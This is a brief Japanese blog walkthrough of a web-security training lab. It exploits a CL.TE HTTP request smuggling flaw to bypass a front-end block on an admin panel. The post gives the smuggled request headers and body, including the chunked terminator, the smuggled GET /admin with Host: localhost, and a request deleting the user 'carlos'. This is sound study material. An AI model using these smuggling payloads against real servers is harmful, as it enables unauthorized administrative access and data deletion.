Hello there, ('ω')ノ

 

HTTPリクエストの密輸を悪用して。

フロントエンドのセキュリティ制御をバイパスするCL.TEの脆弱性を。

 

このラボにはフロントエンドサーバとバックエンドサーバが含まれて。

フロントエンドサーバはチャンクエンコーディングをサポートしておらず。

管理パネルがあるが、フロントエンドサーバはアクセスをブロックするらしく。

 

まずは、ページにアクセスして。

 

 

リクエストをリピータへ。

 

 

adminを挿入してSendするとブロックされて。

 

 

Content-Lengthをオフにして。

リクエストメソッドをPOSTに変更して。

 

 

Hostヘッダ以下を下記に置き換えて、Sendすると。

ローカルユーザのみとのことで。

赤色がフロントエンドの範囲で。

 

Content-Type: application/x-www-form-urlencoded
Content-Length: 37
Transfer-Encoding: chunked

 

0

 

GET /admin HTTP/1.1
X-Ignore: X

 

 

なので、下記を追加して二回ほどSendすると。

ようやく管理パネルにアクセスできて。

　Content-Length: 58

 

　Host: localhost

 

 

下記の内容に変更してSendして。

　Content-Length: 81

 

　GET /admin/delete?username=carlos

 

最後にFollowをクリックすると。

 

クリアできた。

 

 

Best regards, (^^ゞ